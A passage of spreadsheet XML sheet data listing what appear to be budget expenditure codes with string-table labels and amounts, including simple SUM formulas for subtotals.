        <v>2013450</v>
      </c>
      <c r="B195" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C195" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="196" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A196" s="705">
        <v>2013499</v>
      </c>
      <c r="B196" s="705" t="s">
        <v>1062</v>
      </c>
      <c r="C196" s="707">
        <v>3</v>
      </c>
    </row>
    <row r="197" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A197" s="705">
        <v>20135</v>
      </c>
      <c r="B197" s="706" t="s">
        <v>1063</v>
      </c>
      <c r="C197" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="198" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A198" s="705">
        <v>2013501</v>
      </c>
      <c r="B198" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C198" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="199" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A199" s="705">
        <v>2013502</v>
      </c>
      <c r="B199" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C199" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="200" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A200" s="705">
        <v>2013503</v>
      </c>
      <c r="B200" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C200" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="201" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A201" s="705">
        <v>2013550</v>
      </c>
      <c r="B201" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C201" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="202" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A202" s="705">
        <v>2013599</v>
      </c>
      <c r="B202" s="705" t="s">
        <v>1064</v>
      </c>
      <c r="C202" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="203" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A203" s="705">
        <v>20136</v>
      </c>
      <c r="B203" s="706" t="s">
        <v>1065</v>
      </c>
      <c r="C203" s="269">
        <f>SUM(C204:C208)</f>
        <v>354</v>
      </c>
    </row>
    <row r="204" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A204" s="705">
        <v>2013601</v>
      </c>
      <c r="B204" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C204" s="707">
        <v>334</v>
      </c>
    </row>
    <row r="205" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A205" s="705">
        <v>2013602</v>
      </c>
      <c r="B205" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C205" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="206" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A206" s="705">
        <v>2013603</v>
      </c>
      <c r="B206" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C206" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="207" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A207" s="705">
        <v>2013650</v>
      </c>
      <c r="B207" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C207" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="208" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A208" s="705">
        <v>2013699</v>
      </c>
      <c r="B208" s="705" t="s">
        <v>1066</v>
      </c>
      <c r="C208" s="707">
        <v>20</v>
      </c>
    </row>
    <row r="209" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A209" s="705">
        <v>20137</v>
      </c>
      <c r="B209" s="706" t="s">
        <v>1067</v>
      </c>
      <c r="C209" s="269">
        <v>17</v>
      </c>
    </row>
    <row r="210" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A210" s="705">
        <v>2013701</v>
      </c>
      <c r="B210" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C210" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="211" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A211" s="705">
        <v>2013702</v>
      </c>
      <c r="B211" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C211" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="212" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A212" s="705">
        <v>2013703</v>
      </c>
      <c r="B212" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C212" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="213" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A213" s="705">
        <v>2013704</v>
      </c>
      <c r="B213" s="705" t="s">
        <v>1068</v>
      </c>
      <c r="C213" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="214" s="693" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A214" s="705">
        <v>2013750</v>
      </c>
      <c r="B214" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C214" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="215" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A215" s="705">
        <v>2013799</v>
      </c>
      <c r="B215" s="705" t="s">
        <v>1069</v>
      </c>
      <c r="C215" s="707">
        <v>17</v>
      </c>
    </row>
    <row r="216" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A216" s="705">
        <v>20138</v>
      </c>
      <c r="B216" s="706" t="s">
        <v>1070</v>
      </c>
      <c r="C216" s="269">
        <f>SUM(C217:C230)</f>
        <v>2260</v>
      </c>
    </row>
    <row r="217" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A217" s="705">
        <v>2013801</v>
      </c>
      <c r="B217" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C217" s="707">
        <v>2200</v>
      </c>
    </row>
    <row r="218" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A218" s="705">
        <v>2013802</v>
      </c>
      <c r="B218" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C218" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="219" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A219" s="705">
        <v>2013803</v>
      </c>
      <c r="B219" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C219" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="220" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A220" s="705">
        <v>2013804</v>
      </c>
      <c r="B220" s="705" t="s">
        <v>1071</v>
      </c>
      <c r="C220" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="221" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A221" s="705">
        <v>2013805</v>
      </c>
      <c r="B221" s="705" t="s">
        <v>1072</v>
      </c>
      <c r="C221" s="707">
        <v>37</v>
      </c>
    </row>
    <row r="222" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A222" s="705">
        <v>2013808</v>
      </c>
      <c r="B222" s="705" t="s">
        <v>997</v>
      </c>
      <c r="C222" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="223" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A223" s="705">
        <v>2013810</v>
      </c>
      <c r="B223" s="705" t="s">
        <v>1073</v>
      </c>
      <c r="C223" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="224" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A224" s="705">
        <v>2013812</v>
      </c>
      <c r="B224" s="705" t="s">
        <v>1074</v>
      </c>
      <c r="C224" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="225" s="693" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A225" s="705">
        <v>2013813</v>
      </c>
      <c r="B225" s="705" t="s">
        <v>1075</v>
      </c>
      <c r="C225" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="226" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A226" s="705">
        <v>2013814</v>
      </c>
      <c r="B226" s="705" t="s">
        <v>1076</v>
      </c>
      <c r="C226" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="227" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A227" s="705">
        <v>2013815</v>
      </c>
      <c r="B227" s="705" t="s">
        <v>1077</v>
      </c>
      <c r="C227" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="228" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A228" s="705">
        <v>2013816</v>
      </c>
      <c r="B228" s="705" t="s">
        <v>1078</v>
      </c>
      <c r="C228" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="229" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A229" s="705">
        <v>2013850</v>
      </c>
      <c r="B229" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C229" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="230" ht="17.1" customHeight="1" spans="1:3">
      <c r="A230" s="705">
        <v>2013899</v>
      </c>
      <c r="B230" s="705" t="s">
        <v>1079</v>
      </c>
      <c r="C230" s="707">
        <v>23</v>
      </c>
    </row>
    <row r="231" ht="17.1" customHeight="1" spans="1:3">
      <c r="A231" s="705">
        <v>20139</v>
      </c>
      <c r="B231" s="708" t="s">
        <v>1080</v>
      </c>
      <c r="C231" s="269">
        <f>SUM(C232:C234)</f>
        <v>2159</v>
      </c>
    </row>
    <row r="232" ht="17.1" customHeight="1" spans="1:3">
      <c r="A232" s="705">
        <v>2013901</v>
      </c>
      <c r="B232" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C232" s="269"/>
    </row>
    <row r="233" ht="17.1" customHeight="1" spans="1:3">
      <c r="A233" s="705">
        <v>2013904</v>
      </c>
      <c r="B233" s="709" t="s">
        <v>1081</v>
      </c>
      <c r="C233" s="707">
        <v>2100</v>
      </c>
    </row>
    <row r="234" ht="17.1" customHeight="1" spans="1:3">
      <c r="A234" s="705">
        <v>2013999</v>
      </c>
      <c r="B234" s="709" t="s">
        <v>1082</v>
      </c>
      <c r="C234" s="707">
        <v>59</v>
      </c>
    </row>
    <row r="235" ht="17.1" customHeight="1" spans="1:3">
      <c r="A235" s="705">
        <v>20140</v>
      </c>
      <c r="B235" s="708" t="s">
        <v>1083</v>
      </c>
      <c r="C235" s="269">
        <f>SUM(C236:C238)</f>
        <v>104</v>
      </c>
    </row>
    <row r="236" ht="17.1" customHeight="1" spans="1:3">
      <c r="A236" s="705">
        <v>2014001</v>
      </c>
      <c r="B236" s="709" t="s">
        <v>1084</v>
      </c>
      <c r="C236" s="707">
        <v>100</v>
      </c>
    </row>
    <row r="237" ht="17.1" customHeight="1" spans="1:3">
      <c r="A237" s="705">
        <v>2014004</v>
      </c>
      <c r="B237" s="709" t="s">
        <v>1085</v>
      </c>
      <c r="C237" s="707">
        <v>2</v>
      </c>
    </row>
    <row r="238" ht="17.1" customHeight="1" spans="1:3">
      <c r="A238" s="705">
        <v>2014099</v>
      </c>
      <c r="B238" s="709" t="s">
        <v>1086</v>
      </c>
      <c r="C238" s="707">
        <v>2</v>
      </c>
    </row>
    <row r="239" ht="17.1" customHeight="1" spans="1:3">
      <c r="A239" s="705">
        <v>20199</v>
      </c>
      <c r="B239" s="706" t="s">
        <v>1087</v>
      </c>
      <c r="C239" s="269">
        <v>1152</v>
      </c>
    </row>
    <row r="240" ht="17.1" customHeight="1" spans="1:3">
      <c r="A240" s="705">
        <v>2019901</v>
      </c>
      <c r="B240" s="705" t="s">
        <v>1088</v>
      </c>
      <c r="C240" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="241" ht="17.1" customHeight="1" spans="1:3">
      <c r="A241" s="705">
        <v>2019999</v>
      </c>
      <c r="B241" s="705" t="s">
        <v>1089</v>
      </c>
      <c r="C241" s="707">
        <v>1152</v>
      </c>
    </row>
    <row r="242" ht="17.1" customHeight="1" spans="1:3">
      <c r="A242" s="705">
        <v>202</v>
      </c>
      <c r="B242" s="706" t="s">
        <v>1090</v>
      </c>
      <c r="C242" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="243" ht="17.1" customHeight="1" spans="1:3">
      <c r="A243" s="705">
        <v>20201</v>
      </c>
      <c r="B243" s="706" t="s">
        <v>1091</v>
      </c>
      <c r="C243" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="244" ht="17.1" customHeight="1" spans="1:3">
      <c r="A244" s="705">
        <v>2020101</v>
      </c>
      <c r="B244" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C244" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="245" ht="17.1" customHeight="1" spans="1:3">
      <c r="A245" s="705">
        <v>2020102</v>
      </c>
      <c r="B245" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C245" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="246" ht="17.1" customHeight="1" spans="1:3">
      <c r="A246" s="705">
        <v>2020103</v>
      </c>
      <c r="B246" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C246" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="247" ht="17.1" customHeight="1" spans="1:3">
      <c r="A247" s="705">
        <v>2020104</v>
      </c>
      <c r="B247" s="705" t="s">
        <v>1051</v>
      </c>
      <c r="C247" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="248" ht="17.1" customHeight="1" spans="1:3">
      <c r="A248" s="705">
        <v>2020150</v>
      </c>
      <c r="B248" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C248" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="249" ht="17.1" customHeight="1" spans="1:3">
      <c r="A249" s="705">
        <v>2020199</v>
      </c>
      <c r="B249" s="705" t="s">
        <v>1092</v>
      </c>
      <c r="C249" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="250" ht="17.1" customHeight="1" spans="1:3">
      <c r="A250" s="705">
        <v>20202</v>
      </c>
      <c r="B250" s="706" t="s">
        <v>1093</v>
      </c>
      <c r="C250" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="251" ht="17.1" customHeight="1" spans="1:3">
      <c r="A251" s="705">
        <v>2020201</v>
      </c>
      <c r="B251" s="705" t="s">
        <v>1094</v>
      </c>
      <c r="C251" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="252" ht="17.1" customHeight="1" spans="1:3">
      <c r="A252" s="705">
        <v>2020202</v>
      </c>
      <c r="B252" s="705" t="s">
        <v>1095</v>
      </c>
      <c r="C252" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="253" ht="17.1" customHeight="1" spans="1:3">
      <c r="A253" s="705">
        <v>20203</v>
      </c>
      <c r="B253" s="706" t="s">
        <v>1096</v>
      </c>
      <c r="C253" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="254" ht="17.1" customHeight="1" spans="1:3">
      <c r="A254" s="705">
        <v>2020304</v>
      </c>
      <c r="B254" s="705" t="s">
        <v>1097</v>
      </c>
      <c r="C254" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="255" ht="17.1" customHeight="1" spans="1:3">
      <c r="A255" s="705">
        <v>2020306</v>
      </c>
      <c r="B255" s="705" t="s">
        <v>1098</v>
      </c>
      <c r="C255" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="256" ht="17.1" customHeight="1" spans="1:3">
      <c r="A256" s="705">
        <v>20204</v>
      </c>
      <c r="B256" s="706" t="s">
        <v>1099</v>
      </c>
      <c r="C256" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="257" ht="17.1" customHeight="1" spans="1:3">
      <c r="A257" s="705">
        <v>2020401</v>
      </c>
      <c r="B257" s="705" t="s">
        <v>1100</v>
      </c>
      <c r="C257" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="258" ht="17.1" customHeight="1" spans="1:3">
      <c r="A258" s="705">
        <v>2020402</v>
      </c>
      <c r="B258" s="705" t="s">
        <v>1101</v>
      </c>
      <c r="C258" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="259" ht="17.1" customHeight="1" spans="1:3">
      <c r="A259" s="705">
        <v>2020403</v>
      </c>
      <c r="B259" s="705" t="s">
        <v>1102</v>
      </c>
      <c r="C259" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="260" ht="17.1" customHeight="1" spans="1:3">
      <c r="A260" s="705">
        <v>2020404</v>
      </c>
      <c r="B260" s="705" t="s">
        <v>1103</v>
      </c>
      <c r="C260" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="261" ht="17.1" customHeight="1" spans="1:3">
      <c r="A261" s="705">
        <v>2020499</v>
      </c>
      <c r="B261" s="705" t="s">
        <v>1104</v>
      </c>
      <c r="C261" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="262" ht="17.1" customHeight="1" spans="1:3">
      <c r="A262" s="705">
        <v>20205</v>
      </c>
      <c r="B262" s="706" t="s">
        <v>1105</v>
      </c>
      <c r="C262" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="263" ht="17.1" customHeight="1" spans="1:3">
      <c r="A263" s="705">
        <v>2020503</v>
      </c>
      <c r="B263" s="705" t="s">
        <v>1106</v>
      </c>
      <c r="C263" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="264" ht="17.1" customHeight="1" spans="1:3">
      <c r="A264" s="705">
        <v>2020504</v>
      </c>
      <c r="B264" s="705" t="s">
        <v>1107</v>
      </c>
      <c r="C264" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="265" ht="17.1" customHeight="1" spans="1:3">
      <c r="A265" s="705">
        <v>2020505</v>
      </c>
      <c r="B265" s="705" t="s">
        <v>1108</v>
      </c>
      <c r="C265" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="266" ht="17.1" customHeight="1" spans="1:3">
      <c r="A266" s="705">
        <v>2020599</v>
      </c>
      <c r="B266" s="705" t="s">
        <v>1109</v>
      </c>
      <c r="C266" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="267" ht="17.1" customHeight="1" spans="1:3">
      <c r="A267" s="705">
        <v>20206</v>
      </c>
      <c r="B267" s="706" t="s">
        <v>1110</v>
      </c>
      <c r="C267" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="268" ht="17.1" customHeight="1" spans="1:3">
      <c r="A268" s="705">
        <v>2020601</v>
      </c>
      <c r="B268" s="705" t="s">
        <v>1111</v>
      </c>
      <c r="C268" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="269" ht="17.1" customHeight="1" spans="1:3">
      <c r="A269" s="705">
        <v>20207</v>
      </c>
      <c r="B269" s="706" t="s">
        <v>1112</v>
      </c>
      <c r="C269" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="270" ht="17.1" customHeight="1" spans="1:3">
      <c r="A270" s="705">
        <v>2020701</v>
      </c>
      <c r="B270" s="705" t="s">
        <v>1113</v>
      </c>
      <c r="C270" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="271" ht="17.1" customHeight="1" spans="1:3">
      <c r="A271" s="705">
        <v>2020702</v>
      </c>
      <c r="B271" s="705" t="s">
        <v>1114</v>
      </c>
      <c r="C271" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="272" ht="17.1" customHeight="1" spans="1:3">
      <c r="A272" s="705">
        <v>2020703</v>
      </c>
      <c r="B272" s="705" t="s">
        <v>1115</v>
      </c>
      <c r="C272" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="273" ht="17.1" customHeight="1" spans="1:3">
      <c r="A273" s="705">
        <v>2020799</v>
      </c>
      <c r="B273" s="705" t="s">
        <v>1116</v>
      </c>
      <c r="C273" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="274" ht="17.1" customHeight="1" spans="1:3">
      <c r="A274" s="705">
        <v>20208</v>
      </c>
      <c r="B274" s="706" t="s">
        <v>1117</v>
      </c>
      <c r="C274" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="275" ht="17.1" customHeight="1" spans="1:3">
      <c r="A275" s="705">
        <v>2020801</v>
      </c>
      <c r="B275" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C275" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="276" ht="17.1" customHeight="1" spans="1:3">
      <c r="A276" s="705">
        <v>2020802</v>
      </c>
      <c r="B276" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C276" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="277" ht="17.1" customHeight="1" spans="1:3">
      <c r="A277" s="705">
        <v>2020803</v>
      </c>
      <c r="B277" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C277" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="278" ht="17.1" customHeight="1" spans="1:3">
      <c r="A278" s="705">
        <v>2020850</v>
      </c>
      <c r="B278" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C278" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="279" ht="17.1" customHeight="1" spans="1:3">
      <c r="A279" s="705">
        <v>2020899</v>
      </c>
      <c r="B279" s="705" t="s">
        <v>1118</v>
      </c>
      <c r="C279" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="280" ht="17.1" customHeight="1" spans="1:3">
      <c r="A280" s="705">
        <v>20299</v>
      </c>
      <c r="B280" s="706" t="s">
        <v>1119</v>
      </c>
      <c r="C280" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="281" ht="17.1" customHeight="1" spans="1:3">
      <c r="A281" s="705">
        <v>2029999</v>
      </c>
      <c r="B281" s="705" t="s">
        <v>1120</v>
      </c>
      <c r="C281" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="282" ht="17.1" customHeight="1" spans="1:3">
      <c r="A282" s="705">
        <v>203</v>
      </c>
      <c r="B282" s="706" t="s">
        <v>1121</v>
      </c>
      <c r="C282" s="269">
        <v>340</v>
      </c>
    </row>
    <row r="283" ht="17.1" customHeight="1" spans="1:3">
      <c r="A283" s="705">
        <v>20301</v>
      </c>
      <c r="B283" s="706" t="s">
        <v>1122</v>
      </c>
      <c r="C283" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="284" ht="17.1" customHeight="1" spans="1:3">
      <c r="A284" s="705">
        <v>2030101</v>
      </c>
      <c r="B284" s="705" t="s">
        <v>1123</v>
      </c>
      <c r="C284" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="285" ht="17.1" customHeight="1" spans="1:3">
      <c r="A285" s="705">
        <v>2030102</v>
      </c>
      <c r="B285" s="705" t="s">
        <v>1124</v>
      </c>
      <c r="C285" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="286" ht="17.1" customHeight="1" spans="1:3">
      <c r="A286" s="705">
        <v>2030199</v>
      </c>
      <c r="B286" s="705" t="s">
        <v>1125</v>
      </c>
      <c r="C286" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="287" ht="17.1" customHeight="1" spans="1:3">
      <c r="A287" s="705">
        <v>20304</v>
      </c>
      <c r="B287" s="706" t="s">
        <v>1126</v>
      </c>
      <c r="C287" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="288" ht="17.1" customHeight="1" spans="1:3">
      <c r="A288" s="705">
        <v>2030401</v>
      </c>
      <c r="B288" s="705" t="s">
        <v>1127</v>
      </c>
      <c r="C288" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="289" ht="17.1" customHeight="1" spans="1:3">
      <c r="A289" s="705">
        <v>20305</v>
      </c>
      <c r="B289" s="706" t="s">
        <v>1128</v>
      </c>
      <c r="C289" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="290" ht="17.1" customHeight="1" spans="1:3">
      <c r="A290" s="705">
        <v>2030501</v>
      </c>
      <c r="B290" s="705" t="s">
        <v>1129</v>
      </c>
      <c r="C290" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="291" ht="17.1" customHeight="1" spans="1:3">
      <c r="A291" s="705">
        <v>20306</v>
      </c>
      <c r="B291" s="706" t="s">
        <v>1130</v>
      </c>
      <c r="C291" s="269">
        <f>SUM(C292:C298)</f>
        <v>340</v>
      </c>
    </row>
    <row r="292" ht="17.1" customHeight="1" spans="1:3">
      <c r="A292" s="705">
        <v>2030601</v>
      </c>
      <c r="B292" s="705" t="s">
        <v>1131</v>
      </c>
      <c r="C292" s="707">
        <v>60</v>
      </c>
    </row>
    <row r="293" ht="17.1" customHeight="1" spans="1:3">
      <c r="A293" s="705">
        <v>2030602</v>
      </c>
      <c r="B293" s="705" t="s">
        <v>1132</v>
      </c>
      <c r="C293" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="294" ht="17.1" customHeight="1" spans="1:3">
      <c r="A294" s="705">
        <v>2030603</v>
      </c>
      <c r="B294" s="705" t="s">
        <v>1133</v>
      </c>
      <c r="C294" s="707">
        <v>188</v>
      </c>
    </row>
    <row r="295" ht="17.1" customHeight="1" spans="1:3">
      <c r="A295" s="705">
        <v>2030604</v>
      </c>
      <c r="B295" s="705" t="s">
        <v>1134</v>
      </c>
      <c r="C295" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="296" ht="17.1" customHeight="1" spans="1:3">
      <c r="A296" s="705">
        <v>2030607</v>
      </c>
      <c r="B296" s="705" t="s">
        <v>1135</v>
      </c>
      <c r="C296" s="707">
        <v>80</v>
      </c>
    </row>
    <row r="297" ht="17.1" customHeight="1" spans="1:3">
      <c r="A297" s="705">
        <v>2030608</v>
      </c>
      <c r="B297" s="705" t="s">
        <v>1136</v>
      </c>
      <c r="C297" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="298" ht="17.1" customHeight="1" spans="1:3">
      <c r="A298" s="705">
        <v>2030699</v>
      </c>
      <c r="B298" s="705" t="s">
        <v>1137</v>
      </c>
      <c r="C298" s="707">
        <v>12</v>
      </c>
    </row>
    <row r="299" ht="17.1" customHeight="1" spans="1:3">
      <c r="A299" s="705">
        <v>20399</v>
      </c>
      <c r="B299" s="706" t="s">
        <v>1138</v>
      </c>
      <c r="C299" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="300" ht="17.1" customHeight="1" spans="1:3">
      <c r="A300" s="705">
        <v>2039999</v>
      </c>
      <c r="B300" s="705" t="s">
        <v>1139</v>
      </c>
      <c r="C300" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="301" ht="17.1" customHeight="1" spans="1:3">
      <c r="A301" s="705">
        <v>204</v>
      </c>
      <c r="B301" s="706" t="s">
        <v>1140</v>
      </c>
      <c r="C301" s="269">
        <v>16959</v>
      </c>
    </row>
    <row r="302" ht="17.1" customHeight="1" spans="1:3">
      <c r="A302" s="705">
        <v>20401</v>
      </c>
      <c r="B302" s="706" t="s">
        <v>1141</v>
      </c>
      <c r="C302" s="269">
        <v>15</v>
      </c>
    </row>
    <row r="303" ht="17.1" customHeight="1" spans="1:3">
      <c r="A303" s="705">
        <v>2040101</v>
      </c>
      <c r="B303" s="705" t="s">
        <v>1142</v>
      </c>
      <c r="C303" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="304" ht="17.1" customHeight="1" spans="1:3">
      <c r="A304" s="705">
        <v>2040199</v>
      </c>
      <c r="B304" s="705" t="s">
        <v>1143</v>
      </c>
      <c r="C304" s="707">
        <v>15</v>
      </c>
    </row>
    <row r="305" ht="17.1" customHeight="1" spans="1:3">
      <c r="A305" s="705">
        <v>20402</v>
      </c>
      <c r="B305" s="706" t="s">
        <v>1144</v>
      </c>
      <c r="C305" s="269">
        <f>SUM(C306:C315)</f>
        <v>15391</v>
      </c>
    </row>
    <row r="306" ht="17.1" customHeight="1" spans="1:3">
      <c r="A306" s="705">
        <v>2040201</v>
      </c>
      <c r="B306" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C306" s="707">
        <v>13011</v>
      </c>
    </row>
    <row r="307" ht="17.1" customHeight="1" spans="1:3">
      <c r="A307" s="705">
        <v>2040202</v>
      </c>
      <c r="B307" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C307" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="308" ht="17.1" customHeight="1" spans="1:3">
      <c r="A308" s="705">
        <v>2040203</v>
      </c>
      <c r="B308" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C308" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="309" ht="17.1" customHeight="1" spans="1:3">
      <c r="A309" s="705">
        <v>2040219</v>
      </c>
      <c r="B309" s="705" t="s">
        <v>997</v>
      </c>
      <c r="C309" s="707">
        <v>800</v>
      </c>
    </row>
    <row r="310" ht="17.1" customHeight="1" spans="1:3">
      <c r="A310" s="705">
        <v>2040220</v>
      </c>
      <c r="B310" s="705" t="s">
        <v>1145</v>
      </c>
      <c r="C310" s="707">
        <v>1200</v>
      </c>
    </row>
    <row r="311" ht="17.1" customHeight="1" spans="1:3">
      <c r="A311" s="705">
        <v>2040221</v>
      </c>
      <c r="B311" s="705" t="s">
        <v>1146</v>
      </c>
      <c r="C311" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="312" ht="17.1" customHeight="1" spans="1:3">
      <c r="A312" s="705">
        <v>2040222</v>
      </c>
      <c r="B312" s="705" t="s">
        <v>1147</v>
      </c>
      <c r="C312" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="313" ht="17.1" customHeight="1" spans="1:3">
      <c r="A313" s="705">
        <v>2040223</v>
      </c>
      <c r="B313" s="705" t="s">
        <v>1148</v>
      </c>
      <c r="C313" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="314" ht="17.1" customHeight="1" spans="1:3">
      <c r="A314" s="705">
        <v>2040250</v>
      </c>
      <c r="B314" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C314" s="707">
